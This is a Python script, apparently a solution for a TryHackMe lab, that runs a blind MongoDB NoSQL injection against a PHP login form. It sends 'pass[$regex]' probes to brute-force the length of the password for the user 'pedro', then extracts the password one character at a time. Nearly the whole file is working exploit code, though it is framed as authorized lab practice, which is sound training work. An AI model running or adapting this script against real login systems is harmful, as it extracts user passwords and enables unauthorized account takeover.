Simple NoSQL injection (blind, MongoDB $regex) basics - TryHackMe rooms
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import sys
from urllib.parse import quote

import requests
# Lab target and request shape. Authorized testing only: this script sends a
# large number of login attempts against the configured host.
target = "http://<target>/login.php"
# Form template. The password field is renamed to a MongoDB "$regex" operator
# so the server matches the stored password against our probe; "{}" is the
# slot the probe regex is formatted into. The account under attack is "pedro".
post_form = "user={user}&pass[$regex]={{}}&remember=on".format(user="pedro")
header = {
    "User-Agent": "curl/7.74.0",
    "Content-Type": "application/x-www-form-urlencoded",
}
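def regex_gen(args: str, rest: int):
    """Build the anchored probe ``^<args><rest dots>$``.

    ``args`` is the already-confirmed password prefix plus one candidate
    character; ``rest`` is how many unknown characters follow it.

    Args:
        args: literal prefix to match at the start of the password.
        rest: number of trailing wildcard positions.

    Returns:
        The probe regex, or ``None`` when ``rest`` is negative.
    """
    if rest < 0:
        return None
    # Escape the prefix: the candidate alphabet used by the caller contains
    # regex metacharacters ("$", "#"), which the server-side engine would
    # otherwise interpret instead of matching literally, so those characters
    # could never be confirmed.
    return "^" + re.escape(args) + "." * rest + "$"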
def len_burp(len_you_guess: int):
    """Return the length probe ``^<n dots>$`` for a password of ``n`` chars.

    Written with an explicit run of dots rather than ``.{n}`` so the payload
    stays free of braces and commas.
    """
    dots = "." * len_you_guess
    return f"^{dots}$"
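def is_success(resp, error_location: str = "/?err=1"):
    """Classify a login probe response.

    Returns ``False`` only when the server redirected to ``error_location``
    (the failed-login marker of the lab app). Every other response counts as
    a hit, including non-redirect responses such as server errors, so the
    caller must send probes with ``allow_redirects=False`` and should treat
    unexpected status codes as suspect rather than as matches.

    Args:
        resp: a response object exposing a ``headers`` mapping.
        error_location: Location value that marks a rejected login.
    """
    return resp.headers.get("location") != error_location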
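def len_brute(r: requests.Session, max_len: int = 24):
    """Recover the password length by probing ``^.{n}$`` for n = 1..max_len.

    Args:
        r: session used for the POSTs (cookies persist across probes).
        max_len: largest length tried; the default reproduces the original
            ``range(1, 25)`` bound. Raise it for longer passwords.

    Returns:
        The first length whose probe was accepted, or ``None`` if none was.
    """
    for n in range(1, max_len + 1):
        # Percent-encode the probe so it cannot disturb the form encoding of
        # the raw body string it is spliced into.
        body = post_form.format(quote(len_burp(n), safe=""))
        resp = r.post(url=target, data=body, allow_redirects=False, headers=header)
        # Evaluate once so the printed verdict and the branch cannot diverge.
        hit = is_success(resp)
        print("=======\n times:", n, ":", hit)
        if hit:
            return n
    return None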
def post_it(r: requests.Session, post):
    """Send one pre-formatted form body to ``target`` and report the verdict.

    Redirects are not followed: the Location header of the immediate response
    is what ``is_success`` inspects.
    """
    response = r.post(
        url=target,
        data=post,
        allow_redirects=False,
        headers=header,
    )
    return is_success(response)
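def main():
    """Recover pedro's password character by character via ``$regex`` probes.

    First the length is brute-forced, then each position is tried against the
    candidate alphabet; the first accepted character is fixed and the next
    position starts. Exits with a message when the length cannot be found or
    no candidate matches a position, instead of silently continuing with a
    wrong prefix.
    """
    r = requests.Session()
    # Initial GET to the app root (presumably to obtain a session cookie
    # before logging in - confirm against the target app).
    c = r.get(url=target.replace("login.php", ""))
    print(target)
    print(c.status_code, c.headers)
    pass_len = len_brute(r)
    if pass_len is None:
        # range(None) below would raise TypeError; fail with a clear message.
        sys.exit("could not determine the password length (no length probe was accepted)")
    # Candidate alphabet. The original list omitted lowercase "z" (and
    # duplicated "e" and "I"), so any password containing "z" could never be
    # recovered; this set is complete for the same character classes.
    sample = "abcdefghijklmnopqrstuvwxyz1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ`!@#$%"
    prefix = ""
    for pos in range(pass_len):
        for ch in sample:
            candidate = prefix + ch
            regex = regex_gen(candidate, pass_len - pos - 1)
            print(regex)
            # Percent-encode the probe: the body is a raw string, so a bare
            # "%" (present in the alphabet), "&" or "+" would otherwise be
            # interpreted by the server's form parser rather than sent as-is.
            if post_it(r, post_form.format(quote(regex, safe=""))):
                prefix = candidate
                break
        else:
            # No candidate matched: continuing would probe with a wrong
            # prefix and a wrong wildcard count, so stop here.
            sys.exit(
                f"no candidate matched at position {pos} (prefix so far: {prefix!r}); "
                "extend the alphabet"
            )
    print("final_pass = ", prefix)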
# Script entry point; main() returns None, so the exit status is 0 unless
# main() itself terminates via sys.exit or an exception.
if __name__ == "__main__":
    sys.exit(main())